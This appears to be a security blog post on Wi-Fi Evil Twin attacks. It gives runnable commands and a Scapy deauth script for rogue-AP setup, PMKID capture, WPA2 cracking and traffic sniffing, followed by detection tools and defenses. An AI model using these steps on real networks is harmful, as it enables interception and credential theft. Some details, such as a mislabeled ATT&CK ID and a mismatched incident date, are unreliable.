Wi-Fi security failures rarely look like the movies. There is no dramatic exploit, no custom shellcode. An attacker sits in a coffee shop, a hotel lobby, or an airport gate, spins up a software AP on a commodity laptop, and waits. The clients come to them. The traffic flows in plaintext — or, if encrypted, with keys they already hold.

Evil Twin attacks are not theoretical. The DEF CON Wall of Sheep has logged thousands of credential captures from attendees using open or improperly secured wireless networks at a single conference. Enterprise environments suffer targeted variants: attackers parked outside office buildings or inside co-working spaces, cloning corporate SSIDs to intercept VPN-less traffic or steal domain credentials.

This post covers the full technical attack chain — from rogue AP setup and PMKID capture to WPA2 offline cracking, deauthentication frame injection, and traffic interception — along with the detection mechanisms and defenses that actually work.


How Evil Twin Attacks Work: The Attack Chain

The Evil Twin attack exploits how 802.11 clients select and authenticate to access points. The protocol was designed for availability and convenience, not for authenticity. Clients trust SSIDs; they do not verify AP identity by default.

Step 1: Reconnaissance

Before standing up a rogue AP, the attacker identifies the target network’s SSID, BSSID (MAC address), operating channel, and security type.

# Put adapter into monitor mode
sudo airmon-ng start wlan0

# Scan for nearby access points
sudo airodump-ng wlan0mon

# Target specific BSSID and channel
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

airodump-ng output reveals: BSSID, channel, encryption type (WPA2, OPN), ESSID, and connected client MAC addresses. This gives the attacker everything needed to clone the AP.

Step 2: Stand Up the Evil Twin

The rogue AP is configured with hostapd, a user-space daemon that turns any Wi-Fi adapter supporting master mode into a software access point.

# /etc/hostapd/evil-twin.conf
interface=wlan1
driver=nl80211
ssid=CoffeeShop_Free_WiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=0

For a WPA2 clone (when the PSK is known or has been cracked):

interface=wlan1
driver=nl80211
ssid=CorporateSSID
hw_mode=g
channel=11
macaddr_acl=0
auth_algs=1
wpa=2
wpa_passphrase=CrackedPasswordHere
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP

sudo hostapd /etc/hostapd/evil-twin.conf &

# Assign IP and start DHCP for clients
sudo ip addr add 192.168.99.1/24 dev wlan1
sudo dnsmasq --interface=wlan1 \
  --dhcp-range=192.168.99.10,192.168.99.100,12h \
  --no-resolv --server=8.8.8.8

# Enable IP forwarding and NAT to upstream
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

At this point the Evil Twin is operational. Clients that connect receive valid DHCP leases and internet access, which reduces suspicion.

Step 3: PMKID Capture (Clientless WPA2 Hash Extraction)

The traditional method required capturing a complete 4-way handshake, which means waiting for a client to authenticate. The PMKID technique, published by Jens Steube (hashcat author) in August 2018, changed this.

The PMKID is derived from:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || Client_MAC)

It is carried in the RSN information element of the first EAPOL frame (message 1 of the 4-way handshake) that the AP sends once a station associates. An attacker can trigger that frame directly from the AP; no connected client is required.

# Install hcxtools
sudo apt install hcxtools hcxdumptool

# Capture PMKID from target AP (no client needed)
sudo hcxdumptool -i wlan0mon \
  --filterlist_ap=target_bssid.txt \
  --filtermode=2 \
  -o pmkid_capture.pcapng

# Convert capture to hashcat format (mode 22000)
hcxpcapngtool -o hash.hc22000 pmkid_capture.pcapng

Step 4: Offline WPA2 Cracking with hashcat

# Crack WPA2 PMKID or handshake using hashcat mode 22000
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Mask attack for 8-digit numeric PINs (common for ISPs)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# Check cracked results
hashcat -m 22000 hash.hc22000 --show

On a modern GPU (RTX 4090), WPA2 cracking runs at approximately 1.5–2 million hashes per second. A 10-character mixed-case alphanumeric PSK from rockyou.txt falls in minutes; a random 12-character PSK with full character set would require years of brute force — highlighting why PSK complexity matters.

Step 5: Deauthentication Frame Injection

Even if clients are already connected to the legitimate AP, an attacker can force them to reconnect by sending spoofed 802.11 deauthentication frames. These are unencrypted management frames in 802.11; without PMF (802.11w), any station can send them.

# Send deauth frames to all clients of target AP (broadcast)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Target a specific client
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

A Scapy-based deauth flood for demonstration purposes:

#!/usr/bin/env python3
"""
Deauth frame flood — educational/research use only.
Requires monitor mode adapter and root privileges.
"""
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

TARGET_AP  = "AA:BB:CC:DD:EE:FF"   # BSSID of legitimate AP
TARGET_STA = "FF:FF:FF:FF:FF:FF"   # FF:FF:FF:FF:FF:FF = broadcast (all clients)
IFACE      = "wlan0mon"

def build_deauth(ap_mac, sta_mac, reason=7):
    # addr1 = receiver (station), addr2 = transmitter, addr3 = BSSID
    dot11 = Dot11(addr1=sta_mac, addr2=ap_mac, addr3=ap_mac)
    mgmt  = Dot11Deauth(reason=reason)
    return RadioTap() / dot11 / mgmt

packet = build_deauth(TARGET_AP, TARGET_STA)

print(f"[*] Sending deauth frames to {TARGET_STA} from AP {TARGET_AP}")
sendp(packet, iface=IFACE, count=50, inter=0.1, verbose=0)
print("[*] Done.")

Reason code 7 is “Class 3 frame received from nonassociated STA,” a common reason code used in legitimate deauthentication — blending into normal traffic.

Step 6: Traffic Interception and Credential Harvesting

With clients connected to the Evil Twin, the attacker runs a proxy or packet capture:

# Capture all traffic on the rogue interface
sudo tcpdump -i wlan1 -w victim_traffic.pcap

# Wireshark display filter: look for credentials in HTTP POST bodies
http.request.method == "POST" && http contains "password"

# Filter for DNS queries (reveals visited sites)
dns

# Filter for FTP clear-text login
ftp.request.command == "PASS"

# Capture HTTP Authorization headers (Basic auth)
http.authorization

The KARMA Attack

KARMA exploits the Active Scanning behavior of 802.11 clients. When a device is searching for known networks, it broadcasts Probe Requests containing the SSIDs of networks it has previously connected to.

Client → [broadcast] Probe Request: "HomeNetwork"
Client → [broadcast] Probe Request: "Marriott_Guest"
Client → [broadcast] Probe Request: "Delta_WiFi"

A KARMA-capable rogue AP (supported by tools like hostapd-wpe, WiFi-Pumpkin, or airbase-ng) responds to every Probe Request with a matching Probe Response:

Rogue AP → Client: Probe Response: "HomeNetwork" (I am your home network)
Client → Rogue AP: [associates and authenticates]

# airbase-ng with KARMA (-P flag responds to all probe requests)
sudo airbase-ng -P -C 30 -e "FrequentFlyerWifi" wlan0mon

Modern operating systems (iOS 14+, Android 10+, Windows 10 1903+) have partially mitigated KARMA by randomizing MAC addresses and suppressing Probe Request SSIDs for networks not recently seen. However, enterprise devices with MDM-pinned network profiles and older IoT devices remain vulnerable.
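A monitor-side check for the KARMA behaviour described above, added here as an example that is not part of the original post: a KARMA rogue answers every probe it hears, so one transmitter ends up sourcing Probe Responses for many unrelated SSIDs, which a legitimate AP never does. The records, MACs and threshold are constructed placeholders standing in for frames pulled from a monitor-mode capture.

```python
"""Flag transmitters that answer probe requests for many unrelated SSIDs.

Added example, not from the original post. A KARMA-style rogue AP answers
every Probe Request it hears, so one BSSID sources Probe Responses for many
distinct SSIDs. A legitimate AP answers only for the few SSIDs it serves.
Input records are constructed to stand in for frames from a capture.
"""
from collections import defaultdict

# Constructed sample: (transmitter BSSID, SSID carried in the Probe Response).
# The SSIDs echo the probe sequence shown above; the MACs are placeholders.
PROBE_RESPONSES = [
    ("00:11:22:33:44:55", "CorporateSSID"),
    ("00:11:22:33:44:55", "CorporateSSID"),
    ("66:77:88:99:AA:BB", "HomeNetwork"),
    ("66:77:88:99:AA:BB", "Marriott_Guest"),
    ("66:77:88:99:AA:BB", "Delta_WiFi"),
    ("66:77:88:99:AA:BB", "CoffeeShop_Free_WiFi"),
    ("CC:DD:EE:FF:00:11", "GuestWiFi"),
    ("CC:DD:EE:FF:00:11", "CorporateSSID"),   # dual-SSID AP: normal
]

def ssids_per_bssid(records):
    """Group the distinct SSIDs each transmitter has claimed to serve."""
    seen = defaultdict(set)
    for bssid, ssid in records:
        seen[bssid.upper()].add(ssid)
    return seen

def karma_suspects(records, max_ssids=3):
    """Return BSSIDs claiming more distinct SSIDs than any real AP should.

    max_ssids is a tuning knob: multi-SSID deployments legitimately serve a
    few networks per radio, so the threshold sits above that, not at 1.
    """
    return sorted(
        bssid for bssid, ssids in ssids_per_bssid(records).items()
        if len(ssids) > max_ssids
    )

if __name__ == "__main__":
    claims = ssids_per_bssid(PROBE_RESPONSES)
    for bssid in karma_suspects(PROBE_RESPONSES):
        print(f"[!] {bssid} answered probes for {len(claims[bssid])} SSIDs: "
              f"{sorted(claims[bssid])}")
```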


Real-World Incidents

DEF CON Wall of Sheep (Annual, Las Vegas)

The DEF CON Wall of Sheep project passively monitors conference Wi-Fi for credentials transmitted in cleartext or over improperly validated SSL. In a single DEF CON conference, the team has publicly displayed thousands of captured credential pairs — usernames and passwords from email clients, web forms, and poorly implemented apps — collected from convention attendees who connected to networks without VPN.

Airport and Hotel Evil Twin Campaigns (2022–2023)

The Australian Federal Police charged a man in May 2024 with operating Evil Twin hotspots on domestic flights and in airports. The attacker allegedly collected credentials from passengers who connected to SSIDs like “Free Airport Wi-Fi” and entered login details into a captive portal harvester. This is a textbook KARMA + captive portal Evil Twin — no WPA2 cracking required.

Enterprise Evil Twin — Financial Sector (2021)

Threat intelligence reports from Bishop Fox and others have documented red team engagements in which testers parked outside a financial services firm, cloned the corporate SSID visible from the parking lot, and captured domain credentials from laptops that auto-connected using cached profiles. Without 802.1X and certificate validation, the laptops had no way to distinguish the real AP from the rogue.


Detection

Wireless Intrusion Detection System (WIDS) Alerts

Enterprise WIDS platforms perform continuous off-channel scanning and flag:

  • Rogue SSID on unauthorized BSSID: SSID matches production network but MAC is not in the authorized AP list.
  • Signal strength anomaly: Rogue AP with higher RSSI than the authorized AP on the same BSSID.
  • Deauthentication storm: Elevated management frame rate targeting a specific AP or channel.
  • PMKID request anomaly: Unusual association request patterns from unknown clients.
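Detection logic for the deauthentication-storm rule above, run over sample frame records, as an added example that is not part of the original post. It assumes management frames have been reduced to (timestamp, subtype, receiver MAC, BSSID, reason) tuples, as a WIDS sensor or a capture exported to CSV would provide; the records, MACs and thresholds are constructed.

```python
"""Sliding-window detector for deauthentication storms.

Added example, not from the original post. It consumes management-frame
records (timestamp, subtype, receiver MAC, BSSID, reason code) such as a WIDS
sensor or a monitor-mode capture exported to CSV would yield, and alerts when
one BSSID sources more deauth frames in a short window than a healthy AP ever
does. The records below are constructed, not captured.
"""
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12                  # 802.11 management subtype: Deauthentication
BROADCAST = "FF:FF:FF:FF:FF:FF"

def deauth_storms(frames, window_s=2.0, threshold=10):
    """Yield (timestamp, bssid, count) the first time a BSSID exceeds
    `threshold` deauth frames inside `window_s` seconds. Frames are time-ordered."""
    recent = defaultdict(deque)      # bssid -> timestamps still inside the window
    alerted = set()
    for ts, subtype, _receiver, bssid, _reason in frames:
        if subtype != DEAUTH_SUBTYPE:
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window_s:  # drop timestamps that aged out of the window
            q.popleft()
        if len(q) > threshold and bssid not in alerted:
            alerted.add(bssid)
            yield ts, bssid, len(q)

def broadcast_deauths(frames):
    """Deauth frames addressed to the broadcast MAC. A real AP deauthenticates
    individual stations, so a broadcast deauth is a finding on its own."""
    return [f for f in frames if f[1] == DEAUTH_SUBTYPE and f[2] == BROADCAST]

# Constructed sample: one plausible deauth to a single station, then a flood at
# the 0.1 s cadence of the script in Step 5 spoofing the same BSSID, then a beacon.
AP = "AA:BB:CC:DD:EE:FF"
FRAMES = [(0.0, 12, "11:22:33:44:55:66", AP, 7)]
FRAMES += [(10.0 + i * 0.1, 12, BROADCAST, AP, 7) for i in range(50)]
FRAMES += [(20.0, 8, BROADCAST, AP, 0)]        # subtype 8 = Beacon, ignored

if __name__ == "__main__":
    for ts, bssid, n in deauth_storms(FRAMES):
        print(f"[!] t={ts:.1f}s: deauth storm from {bssid}, {n} frames in window")
    print(f"[*] broadcast deauths seen: {len(broadcast_deauths(FRAMES))}")
```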

Cisco WLC (Wireless LAN Controller) rogue detection:

(WLC) > show rogue ap summary
(WLC) > show rogue client summary
(WLC) > config rogue ap classify malicious ssid CorporateSSID

Meraki Air Marshal provides automatic classification of rogue APs in the Security > Air Marshal dashboard, with alerting via webhook or email.

Log Sources and IOCs

| Source | What to Look For |
| --- | --- |
| WIDS alerts | Rogue AP detected on known SSID |
| WLC syslog | %CAPWAP-3-ROGUE_AP_CLASSIFIED |
| Client event logs | 802.1X EAP failure (certificate mismatch) |
| DNS logs | Clients querying from unexpected subnet |
| SIEM | Multiple clients roaming from known AP to unknown BSSID |

CLI Commands for Investigation

# Linux client: check current BSSID and signal
iwconfig wlan0
iw wlan0 link

# Show all visible APs and their BSSIDs on a channel
iw wlan0 scan | grep -E "SSID|BSS|signal|freq"

# Check if AP BSSID has changed (compare against known good)
iw wlan0 link | grep Connected

# Windows: list visible SSIDs and BSSIDs
netsh wlan show networks mode=bssid
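The same `iw wlan0 scan` output, checked automatically against an authorized-AP list, as an added example that is not part of the original post. It applies two of the WIDS rules listed above (production SSID on an unauthorized BSSID, and a production SSID advertised without an RSN element, i.e. an open clone of a WPA2 network); the scan text, MACs and authorized list are constructed placeholders.

```python
"""Check an `iw dev wlan0 scan` dump against an authorized-AP list.

Added example, not from the original post. Two WIDS rules from above are
applied: a production SSID on a BSSID outside the authorized list, and a
production SSID advertised without an RSN element (an open clone of a
network that should be WPA2). Scan text, MACs and SSIDs are constructed.
"""
import re

SCAN_OUTPUT = """\
BSS aa:bb:cc:dd:ee:ff(on wlan0)
\tSSID: CorporateSSID
\tRSN:\t * Version: 1
BSS 02:00:00:00:00:01(on wlan0)
\tSSID: CorporateSSID
BSS 12:34:56:78:9a:bc(on wlan0)
\tSSID: NeighbourNet
\tRSN:\t * Version: 1
"""

# Authorized BSSIDs per production SSID, as a WLC or asset inventory exports it.
AUTHORIZED = {"CorporateSSID": {"AA:BB:CC:DD:EE:FF"}}

def parse_iw_scan(text):
    """Return one dict per BSS block: bssid, ssid and whether an RSN IE was seen."""
    aps = []
    for block in re.split(r"^BSS ", text, flags=re.M)[1:]:
        head, *body = block.splitlines()
        ap = {"bssid": head.split("(")[0].upper(), "ssid": "", "rsn": False}
        for line in (l.strip() for l in body):
            if line.startswith("SSID:"):
                ap["ssid"] = line[5:].strip()
            elif line.startswith("RSN:"):
                ap["rsn"] = True           # RSN IE present: WPA2/WPA3 advertised
        aps.append(ap)
    return aps

def rogue_findings(aps, authorized):
    """(bssid, ssid, reason) for each AP that trips a rule; SSIDs we do not own
    are ignored, as a WIDS authorized list would ignore them."""
    out = []
    for ap in aps:
        if ap["ssid"] not in authorized:
            continue
        if ap["bssid"] not in authorized[ap["ssid"]]:
            out.append((ap["bssid"], ap["ssid"], "unauthorized BSSID"))
        if not ap["rsn"]:
            out.append((ap["bssid"], ap["ssid"], "no RSN element (open clone)"))
    return out
```

Feed it `iw dev wlan0 scan` output from a client that should only ever see your own APs, and every finding is a BSSID worth locating.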

Certificate validation failure on 802.1X networks is a strong indicator. When a client connects to an Evil Twin RADIUS proxy that presents a self-signed or mismatched certificate, the supplicant will log:

Event ID 6272 / 6273 (Windows Security log): NPS rejected authentication
EAP failure reason: Certificate validation failed

Defense and Mitigation

1. Deploy 802.1X / WPA3-Enterprise

WPA2-Personal (PSK) is fundamentally vulnerable — any client with the PSK can impersonate an AP for other clients. 802.1X with EAP-TLS authenticates both the client and the RADIUS server using certificates. When properly configured:

  • The client validates the server certificate before sending credentials.
  • A rogue AP cannot present a valid certificate for your RADIUS server.
  • Capture of the 4-way handshake yields nothing — per-session keys derived from the PMK make offline cracking impossible.

<!-- Windows supplicant policy (Group Policy / Intune) -->
<!-- Enforce server certificate validation -->
<EapType>
  <ServerValidation>
    <DisableUserPromptForServerValidation>true</DisableUserPromptForServerValidation>
    <TrustedRootCA>SHA1_THUMBPRINT_OF_INTERNAL_CA</TrustedRootCA>
  </ServerValidation>
</EapType>

2. Enforce Protected Management Frames (802.11w)

# Cisco WLC — require PMF for SSID
(WLC) > config wlan security pmf required <wlan-id>

# Verify
(WLC) > show wlan <wlan-id> | include PMF

3. Mandate VPN on All Untrusted Wi-Fi

Even a perfect Evil Twin intercept yields only encrypted TLS traffic if clients enforce a VPN. Zero-trust network access (ZTNA) solutions that establish tunnels before any application traffic traverses the network are the most resilient control.

4. Deploy and Monitor WIDS

  • Cisco WLC: Enable rogue detection, configure authorized AP list, set rogue rule for “malicious” classification on SSID match.
  • Meraki Air Marshal: Enable automatic containment with caution (may disrupt neighbor networks); configure alerts for rogue APs matching production SSIDs.
  • Ekahau / NetScout: Site survey tools can be used to baseline known APs and flag changes.

5. Client-Side Certificate Pinning

For mobile applications that transmit sensitive data over Wi-Fi, TLS certificate pinning prevents a MitM proxy on the Evil Twin from intercepting traffic even with a trusted CA cert.

6. Disable Auto-Connect to Open Networks

# Windows: prevent auto-connect to open networks via Intune/GPO
Set-NetConnectionProfile -NetworkCategory Public
netsh wlan set profileparameter name="OldOpenProfile" connectionmode=manual

7. Network Segmentation and DNS Monitoring

Place guest and BYOD devices on isolated VLANs. Monitor DNS resolution from Wi-Fi clients for unexpected resolvers or high-entropy domains (indicators of KARMA-based C2).


MITRE ATT&CK Mapping

| Technique | ID | Description |
| --- | --- | --- |
| Adversary-in-the-Middle: Wi-Fi | T1557.002 | Evil Twin AP for traffic interception |
| Network Sniffing | T1040 | Passive credential capture on rogue AP |
| Brute Force: Password Cracking | T1110.002 | Offline WPA2/PMKID hash cracking |
| Deauthentication Attack | T1563 (sub) | 802.11 management frame injection |


References